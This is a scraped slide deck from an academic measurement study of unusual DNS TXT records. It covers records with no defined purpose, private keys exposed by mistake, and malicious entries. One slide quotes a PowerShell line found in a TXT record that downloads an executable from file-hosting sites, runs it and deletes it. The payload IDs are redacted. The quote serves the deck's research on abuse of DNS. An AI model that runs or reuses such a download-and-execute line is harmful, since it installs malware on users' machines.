TXTing 101: Finding Security Issues in the Long Tail of DNS TXT - - PowerPoint PPT Presentation

txting 101 finding security issues in the long tail of
SMART_READER_LITE
LIVE PREVIEW

TXTing 101: Finding Security Issues in the Long Tail of DNS TXT - - PowerPoint PPT Presentation

Jul 02, 2023 513 likes •1.04k views

TXTing 101: Finding Security Issues in the Long Tail of DNS TXT Records O. van der Toorn 1 R. van Rijswijk-Deij 1 T. Fiebig 2 M. Lindorfer 3 A. Sperotto 1 2020-08-21 1 University of Twente, 2 TU Delft, and 3 TU Wien DNS TXT Records 1 DNS TXT

slide-1
SLIDE 1

TXTing 101: Finding Security Issues in the Long Tail of DNS TXT Records

  • O. van der Toorn1
  • R. van Rijswijk-Deij1
  • T. Fiebig2
  • M. Lindorfer3
  • A. Sperotto1

2020-08-21

1University of Twente, 2TU Delft, and 3TU Wien

slide-2
SLIDE 2

DNS TXT Records

1

slide-3
SLIDE 3

DNS TXT Records

2

dig -t TXT 1.adventure.splode.com

Contact details tide-project.nl

  • .i.vandertoorn@utwente.nl
slide-4
SLIDE 4

Outline

Background Evolution of TXT records Undefjned Purpose Mistakes with a Security Implication Malicious Use Cases Takeaways

3

slide-5
SLIDE 5

Background

slide-6
SLIDE 6

Background: DNS TXT records

  • Allows for a subtle way to add functionality.
  • RFC1464 tries to add structure by defjning a key-value store.
  • RFC5507 discouraged TXT for new expansions.
  • Common uses of TXT records are: SPF, DKIM and DMARC.

4

slide-7
SLIDE 7

Background: DNS TXT records

  • Allows for a subtle way to add functionality.
  • RFC1464 tries to add structure by defjning a key-value store.
  • RFC5507 discouraged TXT for new expansions.
  • Common uses of TXT records are: SPF, DKIM and DMARC.

4

slide-8
SLIDE 8

Background: DNS TXT records

  • Allows for a subtle way to add functionality.
  • RFC1464 tries to add structure by defjning a key-value store.
  • RFC5507 discouraged TXT for new expansions.
  • Common uses of TXT records are: SPF, DKIM and DMARC.

4

slide-9
SLIDE 9

Background: DNS TXT records

  • Allows for a subtle way to add functionality.
  • RFC1464 tries to add structure by defjning a key-value store.
  • RFC5507 discouraged TXT for new expansions.
  • Common uses of TXT records are: SPF, DKIM and DMARC.

4

slide-10
SLIDE 10

Dataset: OpenINTEL

OpenINTEL an active DNS measurement platform.

  • 236 millon domains measured on a daily basis.
  • TXT records between 2015 and 2018 (1 2

1011 records).

5

slide-11
SLIDE 11

Dataset: OpenINTEL

OpenINTEL an active DNS measurement platform.

  • 236 millon domains measured on a daily basis.
  • TXT records between 2015 and 2018 (1 2

1011 records).

5

slide-12
SLIDE 12

Dataset: OpenINTEL

OpenINTEL an active DNS measurement platform.

  • 236 millon domains measured on a daily basis.
  • TXT records between 2015 and 2018 (1.2 × 1011 records).

5

slide-13
SLIDE 13

Evolution of TXT records

slide-14
SLIDE 14

Growth

2015-07 2016-01 2016-07 2017-01 2017-07 2018-01 2018-07

Date

100% 150% 200%

Growth (%)

Domains

6

slide-15
SLIDE 15

Growth

2015-07 2016-01 2016-07 2017-01 2017-07 2018-01 2018-07

Date

100% 150% 200%

Growth (%)

TXT records Domains

6

slide-16
SLIDE 16

TXT Records

2015-07 2016-01 2016-07 2017-01 2017-07 2018-01 2018-07

Date

20 M 40 M 60 M 80 M

Number of TXT records

Email Encoded Miscellaneous Other Patterns Verification 7

slide-17
SLIDE 17

Other TXT Records

2015-07 2016-01 2016-07 2017-01 2017-07 2018-01 2018-07

Date

500 k 1 M

Number of TXT records

Malicious Mistakes Unclassified Undefined Purpose 8

slide-18
SLIDE 18

Undefjned Purpose

slide-19
SLIDE 19

Undefjned Purpose

Type of records in this category:

  • Base 64 Encoded MX Records
  • Empty, or executable references
  • Single Character TXT records

9

slide-20
SLIDE 20

Undefjned Purpose

Type of records in this category:

  • Base 64 Encoded MX Records
  • Empty, or executable references
  • Single Character TXT records

9

slide-21
SLIDE 21

Undefjned Purpose

Type of records in this category:

  • Base 64 Encoded MX Records
  • Empty, or executable references
  • Single Character TXT records

9

slide-22
SLIDE 22

Single Character Records

wtmc@localhost:~$ dig -t TXT single_char.example.org single_char.example.org. 3600 IN TXT "@"

10

slide-23
SLIDE 23

Single Character Records

2015-07 2016-01 2016-07 2017-01 2017-07 2018-01 2018-07 1 1 k 1 M

Number of records (log)

"~" "0" "@"

11

slide-24
SLIDE 24

Origin Tilde Character Records

2015-10 2016-03 2016-08 2017-01 2017-06 2017-11 2018-04 2018-09 1 1 k 1 M

Number of records (log)

40034 19905 13335

12

slide-25
SLIDE 25

Single Character Records

  • Might be used to identify domains
  • Does not have a security impact

13

slide-26
SLIDE 26

Single Character Records

  • Might be used to identify domains
  • Does not have a security impact

13

slide-27
SLIDE 27

Mistakes with a Security Implication

slide-28
SLIDE 28

Mistakes with a Security Implication

Type of records in this category:

  • Certifjcates
  • Public and Private Keys

14

slide-29
SLIDE 29

Mistakes with a Security Implication

Type of records in this category:

  • Certifjcates
  • Public and Private Keys

14

slide-30
SLIDE 30

Public and Private Keys

wtmc@localhost:~$ dig -t TXT key.example.org key.example.org. 3600 IN TXT "-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqGKukO1De7zhZj6+ H0qtjTkVxwTCpvKe4eCZ0FPqri0cb2JZfXJ/DgYSF6vUpwmJG8wVQZK jeGcjDOL5UlsuusFncCzWBQ7RKNUSesmQRMSGkVb1/3j+skZ6UtW+5u 09lHNsj6tQ51s1SPrCBkedbNf0Tp0GbMJDyR4e9T04ZZwIDAQAB

  • ----END PUBLIC KEY-----"

15

slide-31
SLIDE 31

Public and Private Keys

2015-07 2016-01 2016-07 2017-01 2017-07 2018-01 2018-07 20 40 60 80 100 120

Number of records

total private public

16

slide-32
SLIDE 32

Public and Private Keys

At 2018-12-31 there were 89 domains exposing keys:

  • 54 exposed a single key
  • 55.6% expose a private key
  • 35 exposed two keys
  • 94.3% expose a matching key pair

17

slide-33
SLIDE 33

Public and Private Keys

At 2018-12-31 there were 89 domains exposing keys:

  • 54 exposed a single key
  • 55.6% expose a private key
  • 35 exposed two keys
  • 94.3% expose a matching key pair

17

slide-34
SLIDE 34

Public and Private Keys

At 2018-12-31 there were 89 domains exposing keys:

  • 54 exposed a single key
  • 55.6% expose a private key
  • 35 exposed two keys
  • 94.3% expose a matching key pair

17

slide-35
SLIDE 35

Public and Private Keys

At 2018-12-31 there were 89 domains exposing keys:

  • 54 exposed a single key
  • 55.6% expose a private key
  • 35 exposed two keys
  • 94.3% expose a matching key pair

17

slide-36
SLIDE 36

Public and Private Keys

At 2018-12-31 there were 89 domains exposing keys:

  • 54 exposed a single key
  • 55.6% expose a private key
  • 35 exposed two keys
  • 94.3% expose a matching key pair

17

slide-37
SLIDE 37

Public and Private Keys

  • May invalidate security measures like DKIM
  • Shows a misunderstanding of the security technology

18

slide-38
SLIDE 38

Public and Private Keys

  • May invalidate security measures like DKIM
  • Shows a misunderstanding of the security technology

18

slide-39
SLIDE 39

Malicious Use Cases

slide-40
SLIDE 40

Malicious Use Cases

Type of records in this category:

  • Commands
  • JavaScript
  • PowerShell

19

slide-41
SLIDE 41

Malicious Use Cases

Type of records in this category:

  • Commands
  • JavaScript
  • PowerShell

19

slide-42
SLIDE 42

Malicious Use Cases

Type of records in this category:

  • Commands
  • JavaScript
  • PowerShell

19

slide-43
SLIDE 43

PowerShell

wtmc@localhost:~$ dig -t TXT powershell.example.org powershell.example.org. 3600 IN TXT ...

20

slide-44
SLIDE 44

Powershell

$a=(new-object net.webclient); $b=$Env:APPDATA; $w=$Env:WINDIR; $c=$b+\'//t.txt\'; $g=$b+\'//t.exe\'; $p=$w+\'//Microsoft.NET//Framework\'; if (gci -Path $p | where {$_.Name -like \'v4*\'}) { try {$a.DownloadFile(\'https://filebin.ca/<CODE A>\', $c); ren $c t.exe; start $g } catch {$a.DownloadFile(\'https://files.fm/down.php?i=<CODE B>\', $c); ren $c t.exe; start $g } } else { try {$a.DownloadFile(\'https://filebin.ca/<CODE C>\', $c); ren $c t.exe; start $g } catch {$a.DownloadFile(\'https://files.fm/down.php?i=<CODE D>\', $c); ren $c t.exe; start $g } }; sleep 180; rm $g

21

slide-45
SLIDE 45

Bonus: Zoom verifjcation tokens

2019-01 2019-03 2019-05 2019-07 2019-09 2019-11 2020-01 2020-03 2020-05 2020-07

Date

2 k 4 k 6 k 8 k 10 k 12 k 14 k

Number of records

2.19x more records 500 .top domains adding Zoom tokens

Adoption of Zoom verification tokens

"regular" growth WHO publishes news on the virus Many countries start to enforce WFH TXT record count

22

slide-46
SLIDE 46

Takeaways

slide-47
SLIDE 47

Takeaways

  • The majority of DNS TXT use is well defjned.
  • We classify 99.54% of the TXT records in our dataset.

23

slide-48
SLIDE 48

Takeaways

  • The majority of DNS TXT use is well defjned.
  • We classify 99.54% of the TXT records in our dataset.

23

slide-49
SLIDE 49

Takeaways

  • The majority of DNS TXT use is well defjned.
  • We classify 99.54% of the TXT records in our dataset.

23

slide-50
SLIDE 50

Takeaways

Analyzing the tail of the TXT records is not only a needle in the haystack problem, but also becomes a human intelligence problem.

24

slide-51
SLIDE 51

Takeaways

Analyzing the tail of the TXT records is not only a needle in the haystack problem, but also becomes a human intelligence problem.

24

Used regular expressions tide-project.nl/blog/wtmc2020 Project website tide-project.nl